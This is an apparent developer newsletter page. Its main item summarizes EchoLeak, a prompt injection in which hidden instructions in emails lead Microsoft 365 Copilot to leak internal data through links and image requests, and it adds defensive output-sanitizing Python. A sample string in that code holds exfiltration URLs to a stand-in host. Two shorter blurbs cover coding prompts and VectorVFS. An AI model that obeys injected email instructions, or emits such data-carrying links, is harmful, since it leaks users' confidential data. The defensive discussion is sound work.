Dev
EchoLeak - First Known Zero-Click AI Vulnerability
A critical zero-click flaw called EchoLeak was discovered in Microsoft 365 Copilot, allowing data exfiltration from enterprise systems without user interaction. It hijacks Copilot’s RAG pipeline by injecting hidden prompts into seemingly benign emails, coaxing the model to spill internal data via auto-generated links or image requests. Fixed server-side in May (CVE-2025-32711) with no known exploits so far, the incident highlights a new attack surface in AI systems—where LLMs leak data silently. Enterprises should urgently tighten prompt-injection defenses, scope retrieval inputs, and sanitize model outputs to avoid similar LLM-triggered leaks.
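One way to apply the "sanitize model outputs" advice above, as an added example (not code from Microsoft or from the EchoLeak researchers): before the assistant's markdown is rendered, drop every link or image whose target is not on an allowlist. `ALLOWED_HOSTS`, the sample text and the function names are assumptions, and raw HTML is assumed to be escaped by the renderer.

```python
import re
from urllib.parse import urlparse

# Assumption: the only host this deployment trusts for rendered links/images.
ALLOWED_HOSTS = {"contoso.sharepoint.com"}

INLINE = re.compile(r"(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")
REF_USE = re.compile(r"(!?)\[([^\]]*)\]\[([^\]]*)\]")
REF_DEF = re.compile(r"^[ \t]{0,3}\[([^\]]+)\]:[ \t]*<?(\S+?)>?(?:[ \t].*)?$", re.M)
BARE = re.compile(r"https?://[^\s<>)\]]+")

def is_allowed(url):
    try:
        parsed = urlparse(url)
    except ValueError:
        return False
    return parsed.scheme == "https" and parsed.hostname in ALLOWED_HOSTS

def _strip(bang, label):
    # Images vanish entirely; links keep their visible label only.
    return "[image removed]" if bang else label

def sanitize(text):
    """Remove links and images in model output that point off the allowlist."""
    # Collect reference definitions, then delete them all, so any reference
    # form not rewritten below renders as plain text.
    refs = {m.group(1).lower(): m.group(2) for m in REF_DEF.finditer(text)}
    text = REF_DEF.sub("", text)

    def inline(m):
        bang, label, url = m.groups()
        return m.group(0) if is_allowed(url) else _strip(bang, label)

    def ref(m):
        bang, label, key = m.groups()
        url = refs.get((key or label).lower(), "")
        return f"{bang}[{label}]({url})" if is_allowed(url) else _strip(bang, label)

    text = REF_USE.sub(ref, INLINE.sub(inline, text))
    # Last pass: bare URLs, including any that survived inside a kept label.
    return BARE.sub(lambda m: m.group(0) if is_allowed(m.group(0)) else "[link removed]", text)

# Constructed sample of model output, not taken from the real incident.
SAMPLE = ("Summary ready.\n![status][r]\n"
          "See [details](https://evil.example/log?d=SECRET) or "
          "[the wiki](https://contoso.sharepoint.com/wiki).\n\n"
          "[r]: https://evil.example/c.png?d=SECRET\n")

if __name__ == "__main__":
    print(sanitize(SAMPLE))
```

The image case matters most for a zero-click leak, because a chat client fetches images automatically when it renders the reply, with no click needed.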
A comprehensive look at prompts to help developers with coding tasks
A good look at prompts that will help with your Vibe Coding Journey.
Prompt engineering is a bit of an art and a bit of a science – and as we’ve seen, it’s quickly becoming a must-have skill for developers working with AI code assistants. By crafting clear, context-rich prompts, you essentially teach the AI what you need, just as you would onboard a human team member or explain a problem to a peer.
Let me know how you do with these prompts.
Your filesystem as a Vector DB - VectorVFS
Ever wanted to do an AI search on your file system? Now you can. VectorVFS is a lightweight Python package that transforms your Linux filesystem into a vector database by leveraging the native VFS (Virtual File System) extended attributes. Rather than maintaining a separate index or external database, VectorVFS stores vector embeddings directly alongside each file, turning your existing directory structure into an efficient and semantically searchable embedding store.